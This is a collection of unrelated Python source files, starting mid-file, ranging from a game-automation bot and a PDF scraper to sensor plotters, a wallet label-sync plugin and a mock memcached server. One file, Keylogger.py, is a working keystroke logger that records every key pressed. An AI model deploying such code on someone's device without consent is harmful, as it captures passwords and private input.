logger.log(logging.INFO8, "Car API cmd set_charge_limit " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
result = False
reason = ""
try:
result = apiResponseDict["response"]["result"]
reason = apiResponseDict["response"]["reason"]
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
result = False
if result is True or reason == "already_set":
self.stopTryingToApplyLimit = True
self.lastAPIAccessTime = now
self.carapi.resetCarApiLastErrorTime(self)
return True
elif reason == "could_not_wake_buses":
time.sleep(5)
continue
else:
self.carapi.updateCarApiLastErrorTime(self)
return False
|
ArknightsRoguelike.py
|
# Please refer to the video tutorial at https://www.bilibili.com/video/BV1u3411E7KD/ and adapt this script before running it
# Pay attention to the caveats noted in the video or written tutorial
import RaphaelScriptHelper as gamer
import multiprocessing
import ResourceDictionary as rd
import settings
from enum import Enum
class Direction(Enum):
UP = 0
DOWN = 1
LEFT = 2
RIGHT = 3
# Modify this section according to the tutorial before running the script
# =======================================================================
# DID (device ID) of the Android device
gamer.deviceID = "127.0.0.1:62001"
# Preparation steps from tapping Start until entering the actual run
def init_front():
# Select the squad
gamer.touch(rd.zhihuifendui)
gamer.random_delay()
gamer.touch(rd.zhihuifendui)
gamer.random_delay()
# Select the recruitment combination
gamer.touch(rd.quchangbuduan)
gamer.random_delay()
gamer.touch(rd.quchangbuduan)
gamer.random_delay()
# Select the first class and operator
gamer.touch(rd.jinwei)
gamer.random_delay()
gamer.touch(rd.shan)
gamer.random_delay()
gamer.touch(rd.querenganyuan)
gamer.random_delay()
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.random_delay()
gamer.delay(3)
# Select the second class and operator
gamer.touch(rd.fuzhu)
gamer.random_delay()
gamer.touch(rd.xinlan)
gamer.random_delay()
gamer.touch(rd.querenganyuan)
gamer.random_delay()
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.delay(1)
gamer.touch(rd.skip)
gamer.random_delay()
gamer.delay(3)
# Select the third class and operator
gamer.touch(rd.yiliao)
gamer.random_delay()
gamer.touch(rd.furong)
gamer.random_delay()
gamer.touch(rd.querenganyuan)
gamer.random_delay()
gamer.delay(3)
gamer.touch(rd.skip)
# Time needed for the 与虫为伴 stage, in seconds
fight_yu_chong_wei_ban_duration = 80
# The strategy for 与虫为伴 is defined here; refer to the comments inside this function when writing your own
def fight_yu_chong_wei_ban():
for i in range(4): # Loop 4 times, in case an operator gets killed mid-fight and is never redeployed
# Delay right after entering the battle screen. It doesn't need to be long because 2x speed is already active; increase it if your opening operator has a high deployment cost
gamer.delay(4)
# This line deploys 临光 at the specified position facing up; the lines below follow the same pattern and can all be replaced
fight_agent_arrange(rd.fight_icon_shan, rd.yuchongweiban_shan, Direction.UP)
# Wait 5 seconds after the first deployment before placing the next operator (mind the DP regeneration time)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.yuchongweiban_furong, Direction.LEFT)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.yuchongweiban_xinlan, Direction.LEFT)
gamer.delay(10)
# Time needed for the 驯兽小屋 stage, in seconds
fight_xun_shou_xiao_wu_duration = 80
# The strategy for 驯兽小屋 is defined here; see the comments in fight_yu_chong_wei_ban
def fight_xun_shou_xiao_wu():
for i in range(4):
gamer.delay(4)
fight_agent_arrange(rd.fight_icon_shan, rd.xunshouxiaowu_shan, Direction.RIGHT)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.xunshouxiaowu_furong, Direction.DOWN)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.xunshouxiaowu_xinlan, Direction.DOWN)
gamer.delay(10)
# Time needed for the 礼炮小队 stage, in seconds
fight_li_pao_xiao_dui_duration = 80
# The strategy for 礼炮小队 is defined here; see the comments in fight_yu_chong_wei_ban
def fight_li_pao_xiao_dui():
for i in range(4):
gamer.delay(4)
fight_agent_arrange(rd.fight_icon_shan, rd.lipaoxiaodui_shan, Direction.RIGHT)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.lipaoxiaodui_furong, Direction.UP)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.lipaoxiaodui_xinlan, Direction.DOWN)
gamer.delay(10)
# Time needed for the 意外 stage, in seconds
fight_yi_wai_duration = 80
# The strategy for 意外 is defined here; see the comments in fight_yu_chong_wei_ban
def fight_yi_wai():
for i in range(4):
gamer.delay(4)
fight_agent_arrange(rd.fight_icon_shan, rd.yiwai_shan, Direction.DOWN)
gamer.delay(5)
fight_agent_arrange(rd.fight_icon_furong, rd.yiwai_furong, Direction.LEFT)
gamer.delay(8)
fight_agent_arrange(rd.fight_icon_xinlan, rd.yiwai_xinlan, Direction.LEFT)
gamer.delay(10)
# =======================================================================
# Do not modify anything below this point unless you know what you are doing
# Run via ADB
gamer.deviceType = 1
# Global flag, do not modify
isFightLose = False
# Screen resolution, do not modify; keep your device set to match this
screen_size = (2340, 1080)
# Generic operator deployment helper for the battle screen; the three parameters are operator, position, and facing direction (0-3 = up/down/left/right)
def fight_agent_arrange(agent, pos, direction):
screen_w, screen_h = screen_size
x, y = pos
shift = settings.touchPosRange
if direction == Direction.UP:
_y = y - 400
if (_y < shift):
_y = shift
slide_final_pos = (x, _y)
elif direction == Direction.DOWN:
_y = y + 400
if (_y > screen_h - shift):
_y = screen_h - shift
slide_final_pos = (x, _y)
elif direction == Direction.LEFT:
_x = x - 400
if (_x < shift):
_x = shift
slide_final_pos = (_x, y)
elif direction == Direction.RIGHT:
_x = x + 400
if (_x > screen_w - shift):
_x = screen_w - shift
slide_final_pos = (_x, y)
else:
return False
if gamer.find_pic_slide(agent, pos):
gamer.delay(0.5)
gamer.slide((pos, slide_final_pos))
gamer.delay(0.5)
return True
return False
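# Illustrative call with hypothetical coordinates:
#   fight_agent_arrange(rd.fight_icon_shan, (1200, 300), Direction.UP)
# would clamp the upward swipe target to (1200, settings.touchPosRange), since
# 300 - 400 falls below the allowed margin, then swipe from (1200, 300) to that
# point to set the operator's facing direction.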
# Skip the results screen
def skip_ending():
gamer.random_delay()
gamer.touch(rd.bottom)
gamer.delay(0.5)
gamer.touch(rd.bottom)
gamer.delay(0.5)
gamer.touch(rd.bottom)
gamer.delay(0.5)
gamer.touch(rd.bottom)
gamer.random_delay()
gamer.touch(rd.bottom)
# Post-battle handling
def process_after_fight():
for i in range(5): # Some stages have special enemies and finish slowly, so check the result up to five times, 10s apart
if gamer.find_pic_touch(rd.success_pass):
gamer.random_delay()
gamer.find_pic_touch(rd.nazou)
gamer.delay(1)
gamer.find_pic_touch(rd.exit)
gamer.delay(0.5)
if gamer.find_pic_touch(rd.exit_confirm):
return True
else:
return False
# Also consider the failure case
elif gamer.find_pic_touch(rd.signal_lost):
gamer.random_delay()
gamer.delay(5)
skip_ending()
global isFightLose
isFightLose = True
else:
if i == 4:
return False
gamer.delay(10)
# Pre-battle handling
def process_before_fight():
gamer.random_delay()
gamer.find_pic_touch(rd.enter)
gamer.random_delay()
gamer.find_pic_touch(rd.kaishixingdong)
gamer.delay(9) # Wait 9 seconds from tapping the Start Operation button until the battle has loaded
gamer.find_pic_touch(rd.speed_1x) # Switch to 2x speed
# Regular combat node
def fight():
global isFightLose
isFightLose = False
if gamer.find_pic_touch(rd.fight_lipaoxiaodui):
process_before_fight()
t = multiprocessing.Process(target=fight_li_pao_xiao_dui)
t.start()
gamer.delay(fight_li_pao_xiao_dui_duration)
t.terminate()
elif gamer.find_pic_touch(rd.fight_yuchongweiban):
process_before_fight()
t = multiprocessing.Process(target=fight_yu_chong_wei_ban)
t.start()
gamer.delay(fight_yu_chong_wei_ban_duration)
t.terminate()
elif gamer.find_pic_touch(rd.fight_xunshouxiaowu):
process_before_fight()
t = multiprocessing.Process(target=fight_xun_shou_xiao_wu)
t.start()
gamer.delay(fight_xun_shou_xiao_wu_duration)
t.terminate()
elif gamer.find_pic_touch(rd.fight_yiwai):
process_before_fight()
t = multiprocessing.Process(target=fight_yi_wai)
t.start()
gamer.delay(fight_yi_wai_duration)
t.terminate()
else:
return False
process_after_fight()
return True
# Handle the 不期而遇 node
def buqieryu():
if gamer.find_pic_touch(rd.buqieryu):
gamer.random_delay()
gamer.find_pic_touch(rd.enter_buqieryu)
gamer.delay(8) # Wait for the event text to be displayed
gamer.random_delay()
for i in range(2):
if gamer.find_pic_touch(rd.taopao):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
elif gamer.find_pic_touch(rd.xiwang):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
elif gamer.find_pic_touch(rd.shengming):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
elif gamer.find_pic_touch(rd.yuanshiding):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
else:
# Scroll down a little and retry once, in case the options aren't fully shown
gamer.slide(rd.right_slide_down)
gamer.delay(3)
gamer.touch(rd.bottom)
gamer.random_delay()
return True
else:
return False
# Handle the 诡异行商 node (farm investments)
def guiyixingshang():
if gamer.find_pic_touch(rd.guiyixingshang):
gamer.random_delay()
gamer.find_pic_touch(rd.enter_guiyixingshang)
gamer.delay(3)
gamer.random_delay()
if gamer.find_pic_touch(rd.touzi_enter):
gamer.find_pic_touch(rd.touzirukou)
gamer.random_delay()
pos = gamer.find_pic(rd.touzi_confirm, True)
for i in range(0,20): # Tap the investment confirm button 20 times
gamer.touch(pos)
gamer.delay(0.5)
gamer.find_pic_touch(rd.suanle)
gamer.random_delay()
gamer.find_pic_touch(rd.suanle2)
gamer.random_delay()
pos = gamer.find_pic(rd.exit_shop)
gamer.touch(pos)
gamer.random_delay()
gamer.touch(pos)
else:
pos = gamer.find_pic(rd.exit_shop)
gamer.touch(pos)
gamer.random_delay()
gamer.touch(pos)
return True
else:
return False
# 幕间余兴 node: just pick the exit option here
def mujianyuxing():
if gamer.find_pic_touch(rd.mujianyuxing):
gamer.random_delay()
gamer.find_pic_touch(rd.enter_buqieryu)
gamer.delay(8) # Wait for the event text to be displayed
gamer.random_delay()
for i in range(2):
if gamer.find_pic_touch(rd.taopao):
gamer.delay(1)
gamer.find_pic_touch(rd.choose_confirm)
break
else:
# Scroll down a little and retry once, in case the options aren't fully shown
gamer.slide(rd.right_slide_down)
gamer.delay(3)
gamer.touch(rd.bottom)
gamer.random_delay()
return True
else:
return False
# Exit to the main screen, abandon the current run, and restart
def exit_game():
gamer.find_pic_touch(rd.exit_all)
gamer.delay(2)
gamer.random_delay()
gamer.find_pic_touch(rd.giveup)
gamer.random_delay()
gamer.find_pic_touch(rd.giveup_confirm)
skip_ending()
# Operator squad setup; as long as the resolution is unchanged, these taps are fixed
def gan_yuan_bian_dui():
gamer.touch((2076,1026))
gamer.random_delay()
gamer.touch((1846, 60))
gamer.random_delay()
gamer.touch((987,242))
gamer.random_delay()
gamer.touch((987, 446))
gamer.random_delay()
gamer.touch((987, 656))
gamer.random_delay()
gamer.touch((2078, 1022))
gamer.random_delay()
gamer.touch((195, 52))
# Script execution starts here
gamer.deviceType = 1
while True:
if gamer.find_pic_touch(rd.rg_start):
gamer.random_delay()
init_front()
gamer.random_delay()
if gamer.find_pic_touch(rd.enter_game):
gamer.delay(5)
gan_yuan_bian_dui()
# Floor 1 only has four nodes, and the first node is always a combat node
# 1
fight()
# TODO: consider a smarter pathfinding algorithm; currently only a fixed priority order is supported
# 2
gamer.random_delay()
if buqieryu() is False:
if fight() is False:
if mujianyuxing() is False:
exit_game()
continue
if isFightLose:
continue
# Swipe the map forward here to avoid re-detecting earlier nodes
gamer.slide(rd.bottom_slide_left)
# 3
gamer.random_delay()
if buqieryu() is False:
if fight() is False:
if mujianyuxing() is False:
exit_game()
continue
if isFightLose:
continue
# The fourth node is always 诡异行商
# 4
guiyixingshang()
gamer.delay(5)
gamer.random_delay()
exit_game()
else:
break
|
download_pdfs.py
|
import os
import time
import pickle
import random
import threading
import requests
import requests_random_user_agent  # noqa: F401 - imported for its side effect of randomising the requests User-Agent
from utils import Config
timeout_secs = 10 # after this many seconds we give up on a paper
if not os.path.exists(Config.pdf_dir):
os.makedirs(Config.pdf_dir)
db = pickle.load(open(Config.db_path, 'rb'))
# for pid,j in db.items():
def download_one(pid_list):
# get list of all pdfs we already have
have = set(os.listdir(Config.pdf_dir))
numok = 0
numtot = 0
proxy = None
for pid in pid_list:
j = db[pid]
pdfs = [x['href']
for x in j['links'] if x['type'] == 'application/pdf']
assert len(pdfs) == 1
pdf_url = pdfs[0] + '.pdf'
basename = pdf_url.split('/')[-1]
fname = os.path.join(Config.pdf_dir, basename)
# try retrieve the pdf
numtot += 1
try:
if basename not in have:
print('fetching %s into %s' % (pdf_url, fname))
req = requests.get(
pdf_url, timeout=timeout_secs, proxies=proxy)
with open(fname, 'wb') as fp:
fp.write(req.content)
time.sleep(0.05 + random.uniform(0, 0.1))
else:
print('%s exists, skipping' % (fname, ))
numok += 1
except Exception as e:
print('error downloading: ', pdf_url)
print(e)
# change proxy
proxy_info = None
proxy = {'http': proxy_info, 'https': proxy_info}
print('%d/%d of %d downloaded ok.' % (numok, numtot, len(db)))
#print('final number of papers downloaded okay: %d/%d' % (numok, len(db)))
if __name__ == '__main__':
n_threads = 50
pid_list = list(db.keys())
stride = max(1, len(db) // n_threads)  # avoid a zero stride when there are fewer papers than threads
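# Illustrative sketch with hypothetical numbers: if len(db) == 1000 and
# n_threads == 50, stride == 20, so the threads below receive pid_list[0:20],
# pid_list[20:40], ..., pid_list[980:1000], i.e. contiguous, non-overlapping slices.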
thread_pool = []
for start in range(0, len(db), stride):
end = min(start+stride, len(db))
t = threading.Thread(target=download_one, args=(pid_list[start:end],))
thread_pool.append(t)
t.start()
for t in thread_pool:
t.join()
|
gragh_test.py
|
import pygame
import threading
import multiprocessing
from colour import Color
GR_HEIGHT = 400
GR_WIDTH = GR_HEIGHT * 3
all_pixels_num =64
sensor_data = [29.8888]*all_pixels_num
bk_grd_data = [27.888]*all_pixels_num
pixels_row = 8
pixels_colum = 8
height = 480
width = 480
pixels_size_height = height /pixels_colum
pixels_size_width = width /pixels_row
num_color = (0,0,0)
resolution = (height,width )
num_size = height // pixels_row // 2  # integer division: pygame.font.Font expects an int size
max_temp = 31
min_temp = 26
color_resolution = 100
blue = Color("blue")
# list() materialises the colour gradient generator into a list.
colors = list(blue.range_to(Color("red"), color_resolution))
colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255)) for c in colors]
#print colors
def select_color(val):
if val < min_temp:
return 0
# Clamp into [0, color_resolution - 1] so out-of-range readings don't index outside the palette
idx = int((float(val) - min_temp) / (max_temp - min_temp) * color_resolution - 1)
return max(0, min(idx, color_resolution - 1))
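# Worked example with the defaults above: a reading of 28.5 degC maps to
# int((28.5 - 26) / (31 - 26) * 100 - 1) == 49, roughly the middle of the
# 100-step blue-to-red gradient.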
def conver_val_to_str(value):
val_str=str(value)
val_str=val_str[0:4]
return val_str
def raw():
while(1):
pygame.init()
gragh=pygame.display.set_mode( resolution)
gragh.fill((0,0,0))
font = pygame.font.Font(None, num_size)
pygame.mouse.set_visible(False)
pygame.display.set_caption("raw data!")
for i in range(pixels_row):
for j in range(pixels_colum):
pygame.draw.rect(gragh,colors[select_color(sensor_data[pixels_row*i+j])],(i*pixels_size_width,j*pixels_size_height,pixels_size_width,pixels_size_height))
num=font.render(conver_val_to_str(sensor_data[pixels_row*i+j]),0,num_color)
gragh.blit(num,(i*pixels_size_width,j*pixels_size_height))
pygame.display.update()
while 1:
pass
def back():
while 1:
while(1):
pygame.init()
gragh=pygame.display.set_mode( resolution)
gragh.fill((0,0,0))
font = pygame.font.Font(None, num_size)
pygame.mouse.set_visible(False)
pygame.display.set_caption("raw data!")
for i in range(pixels_row):
for j in range(pixels_colum):
pygame.draw.rect(gragh,colors[select_color(bk_grd_data[pixels_row*i+j])],(i*pixels_size_width,j*pixels_size_height,pixels_size_width,pixels_size_height))
num=font.render(conver_val_to_str(bk_grd_data[pixels_row*i+j]),0,num_color)
gragh.blit(num,(i*pixels_size_width,j*pixels_size_height))
pygame.display.update()
while 1:
pass
def ther():
while 1:
while(1):
pygame.init()
gragh=pygame.display.set_mode( resolution)
gragh.fill((0,0,0))
font = pygame.font.Font(None, num_size)
pygame.mouse.set_visible(False)
pygame.display.set_caption("raw data!")
for i in range(pixels_row):
for j in range(pixels_colum):
pygame.draw.rect(gragh,colors[select_color(sensor_data[pixels_row*i+j])],(i*pixels_size_width,j*pixels_size_height,pixels_size_width,pixels_size_height))
num=font.render(conver_val_to_str(sensor_data[pixels_row*i+j]),0,num_color)
gragh.blit(num,(i*pixels_size_width,j*pixels_size_height))
pygame.display.update()
while 1:
pass
P1=multiprocessing.Process(target = raw)
P2=multiprocessing.Process(target = back)
P3=multiprocessing.Process(target = ther)
P1.start()
P2.start()
P3.start()
'''
pygame.init()
raw_t = threading.Thread( target = raw)
bk_grd_t = threading.Thread(target = back)
#ther_t = threading.Thread(target = ther)
raw_t.start()
bk_grd_t.start()
#ther_t.start()
raw_t.join()
'''
|
iron-plotter.py
|
from datetime import datetime, timedelta
from multiprocessing.connection import Client, Listener
from multiprocessing import Process, Pipe
from collections import deque
from math import nan
import argparse
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib
def server(conn, serial_port):
import serial
tty = serial.Serial(serial_port, 2000000, timeout=None)
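# Each serial line is expected to carry five comma-separated integers:
# tip temperature, handle temperature x10, power x10, PWM duty, and raw tip thermocouple reading in uV.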
while True:
raw_line = tty.readline()
try:
raw_data = raw_line.decode('ascii').split(',')
if len(raw_data) != 5:
print(f"Received garbage data {raw_line}")
continue
time = datetime.utcnow()
tip = int(raw_data[0])
handle_x10 = int(raw_data[1])
power_x10 = int(raw_data[2])
pwm = int(raw_data[3])
tip_raw_uv = int(raw_data[4])
except Exception as ex:
print(
f"Received garbage data {raw_line} which caused exception: {ex}")
continue
conn.send({
'time': time,
'tip': tip,
'handle_x10': handle_x10,
'power_x10': power_x10,
'pwm': pwm,
'tip_raw_uv': tip_raw_uv,
})
def client(conn):
d_time = deque()
d_tip = deque()
d_handle = deque()
d_tipraw = deque()
d_power = deque()
d_pwm = deque()
fig: matplotlib.figure.Figure
ax: matplotlib.axes.Axes
ax1: matplotlib.axes.Axes
fig, (ax, ax1) = plt.subplots(2, 1, sharex=True,
gridspec_kw={'height_ratios': [2, 1]})
ax_2 = ax.twinx()
ax1_2 = ax1.twinx()
# plt.ion()
ax.set_xlabel('Time')
ax.set_ylabel('Temp (°C)')
ax.set_ylim(0, 450)
l_tip, = ax.plot([], '-r', label="Tip")
l_handle, = ax.plot([], '-g', label="Handle")
ax.legend(loc='upper left')
ax_2.set_ylabel('Thermocouple Raw (μV)')
ax_2.set_ylim(0, 20000)
l_tipraw, = ax_2.plot([], '-c', label="Tip Raw")
ax_2.yaxis.get_label().set_color(l_tipraw.get_color())
ax_2.legend(loc='upper right')
ax1.set_ylabel('Power (W)')
l_power, = ax1.plot([], '-b', label="Power")
ax1.yaxis.get_label().set_color(l_power.get_color())
ax1_2.set_ylabel('PWM [0-255]')
l_pwm, = ax1_2.plot([], '-y', label="PWM")
ax1_2.yaxis.get_label().set_color(l_pwm.get_color())
ax1_2.set_ylim(-5, 260)
ax1_2.set_yticks([0, 32, 64, 96, 128, 160, 192, 224, 256])
ax.grid()
ax1.grid()
plt.subplots_adjust(hspace=.0)
def run(_i):
now = datetime.utcnow()
cutoff = now - timedelta(seconds=30)
while len(d_time) > 0 and d_time[0] < cutoff:
d_time.popleft()
d_tip.popleft()
d_handle.popleft()
d_tipraw.popleft()
d_power.popleft()
d_pwm.popleft()
while conn.poll():
item = conn.recv()
if len(d_time) > 0 and (item['time'] - d_time[len(d_time) - 1]).total_seconds() >= 1:
d_time.append(item['time'])  # append a timestamp (not the whole dict) for the NaN break sample
d_tip.append(nan)
d_handle.append(nan)
d_tipraw.append(nan)
d_power.append(nan)
d_pwm.append(nan)
d_time.append(item['time'])
d_tip.append(item['tip'])
d_handle.append(item['handle_x10'] / 10)
d_tipraw.append(item['tip_raw_uv'])
d_power.append(item['power_x10'] / 10)
d_pwm.append(item['pwm'])
l_tip.set_data(d_time, d_tip)
l_handle.set_data(d_time, d_handle)
l_tipraw.set_data(d_time, d_tipraw)
l_power.set_data(d_time, d_power)
l_pwm.set_data(d_time, d_pwm)
ax.set_xlim(cutoff, now)
ax1.relim()
ax1.autoscale(axis='y')
return [l_tip, l_handle, l_tipraw, l_power, l_pwm]
ani = animation.FuncAnimation(fig, run, interval=200, blit=False)
plt.show(block=True)
conn.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("command", help="Action - server reads from serial port, client plots data, leave out to run both",
nargs='?', choices=["server", "client", "all"], default="all")
parser.add_argument(
"serial_port", help="The serial port to use, only used for server. Default: /dev/ttyAMA0", nargs='?', default="/dev/ttyAMA0")
parser.add_argument(
"--addr", help="The address to connect/bind to, not used if running both. Default: 0.0.0.0 for server and 127.0.0.1 for client")
parser.add_argument(
"--port", help="The port to connect/bind to, not used if running both. Default: 3000", type=int, default=3000)
args = parser.parse_args()
if args.command == "server":
address = (args.addr if args.addr is not None else "0.0.0.0", args.port)
print(f"Listening on {address}")
listener = Listener(address, family='AF_INET', authkey=b'IronOS')
conn = listener.accept()
listener.close()
server(conn, args.serial_port)
elif args.command == "client":
address = (args.addr if args.addr is not None else "127.0.0.1", args.port)
print(f"Connecting to {address}")
conn = Client(address, family='AF_INET', authkey=b'IronOS')
print(f"Connected!")
client(conn)
elif args.command == "all":
pipe_a, pipe_b = Pipe()
p = Process(target=server, args=(pipe_a, args.serial_port))
p.start()
try:
client(pipe_b)
finally:
p.join(3)
if p.is_alive():
p.terminate()
else:
parser.print_help()
|
Keylogger.py
|
# Import modules
from pynput.keyboard import Listener, Key # pip install pynput
from threading import Thread
class Logger:
# Constructor
def __init__(self):
self.__keys = ''
self.__stopped = None
self.__thread = self.__NewThread()
# Log key press
def __LogKeyPress(self, key: str):
key_text = str(key)
for old, new in {
'Key.space': ' ',
'Key.enter': '\n',
'\'': '',
'Key.': ''
}.items(): key_text = key_text.replace(old, new)
if key == Key.backspace and len(self.__keys) > 0:
self.__keys = self.__keys[:-1]
if len(key_text) > 1:
key_text = f"[{key_text}]".upper()
self.__keys += key_text
if self.__stopped:
return False
# Run logger
def __Run(self):
with Listener(on_press=self.__LogKeyPress) as listener:
# The context manager already starts the listener; calling start() again would raise RuntimeError.
listener.join()
# Return new thread
def __NewThread(self):
return Thread(target=self.__Run)
# Return all logs
def FetchLogs(self) -> str:
return self.__keys
# Clean logs
def CleanLogs(self):
self.__keys = ''
# Start keylogger
def Start(self):
self.__stopped = False
self.__thread.start()
# Stop keylogger
def Stop(self):
self.__stopped = True
self.__thread.join()
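# A minimal usage sketch (not part of the original module; the ten-second capture window is illustrative only):
#
#   logger = Logger()
#   logger.Start()
#   time.sleep(10)            # requires `import time`; capture keystrokes for a while
#   logger.Stop()             # note: Stop() only returns after the next key press unblocks the listener
#   print(logger.FetchLogs())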
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum_dash
from electrum_dash.plugins import BasePlugin, hook
from electrum_dash.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.bauerj.eu'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum_dash.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum_dash.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if wallet not in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.print_error("could not retrieve labels")
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
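# Derive the sync credentials deterministically from the wallet fingerprint:
# password = first 32 hex chars of SHA1(mpk), iv = first 16 bytes of SHA256(password),
# wallet_id = hex SHA256(mpk).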
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
mock_binary_server.py
|
import socket
import socketserver
import threading
class MockMemSession(socketserver.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
self.server.append(data)
self.server.server.basic_handler(self.server.data, self.request)
class MockMemcachedServerInternal(socketserver.ThreadingMixIn, socketserver.TCPServer):
def __init__(self, address, port, request_class, server):
super(MockMemcachedServerInternal, self).__init__(server_address=(address, port),
RequestHandlerClass=request_class)
self.data = []
self.server = server
def append(self, data):
self.data.append(data)
def reset(self):
self.data = []
def log(self, msg):
self.server.log(msg)
def pop(self, n):
data = b''
if n >= len(self.data):
data = self.data[:]
self.data = []
else:
data = self.data[:n]
self.data = self.data[n:]
return data
class MockMemcachedServer:
def __init__(self, address='127.0.0.1', port=52135, debug=False, handler=None):
socketserver.TCPServer.allow_reuse_address = True
self.debug = debug
self.address = address
self.port = port
self.server = MockMemcachedServerInternal(address, port, MockMemSession, self)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.test_handler = handler
self.running = False
def set_debug(self, debug):
self.debug = debug
def set_handler(self, handler):
self.test_handler = handler
def start(self):
self.running = True
self.log('Starting server thread at {}:{}'.format(self.address, self.port))
self.server_thread.start()
def basic_handler(self, data, req):
self.log('Data: {}'.format(data))
if self.test_handler:
self.test_handler(data, req, self.debug)
def stop(self):
self.log('Shut down server')
if self.running:
self.server.shutdown()
self.log('Socket close')
self.server.socket.close()
self.log('Joining')
if self.running:
self.server_thread.join()
self.running = False
self.log('Thread finished')
def reset(self):
self.test_handler = None
self.server.reset()
def get_host_address(self):
return self.address, self.port
def log(self, msg):
if self.debug:
print(msg)
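# A rough usage sketch (the handler body and port are illustrative only):
#
#   def echo_handler(data, req, debug):
#       req.sendall(data[-1])          # echo the most recently received chunk back
#
#   server = MockMemcachedServer(port=52135, debug=True, handler=echo_handler)
#   server.start()
#   ...                                # exercise the client under test against 127.0.0.1:52135
#   server.stop()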
|
ocs_end_of_night_process.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# +
# import(s)
# -
from OcsCameraEntity import *
from OcsSequencerEntity import *
import multiprocessing
import os
# +
# function: worker_code()
# -
def worker_code(entity='', entobj=None):
# debug output
print('name: {0:s}'.format(multiprocessing.current_process().name))
print('entity: {0:s}'.format(entity))
if hasattr(os, 'getppid'):
print('parent process id: {0:s}'.format(str(os.getppid())))
if hasattr(os, 'getpid'):
print('process id: {0:s}'.format(str(os.getpid())))
# do end_of_night stuff
if entobj:
# disable
entobj.logger.info('{0:s}.disable()'.format(entity))
entobj.disable()
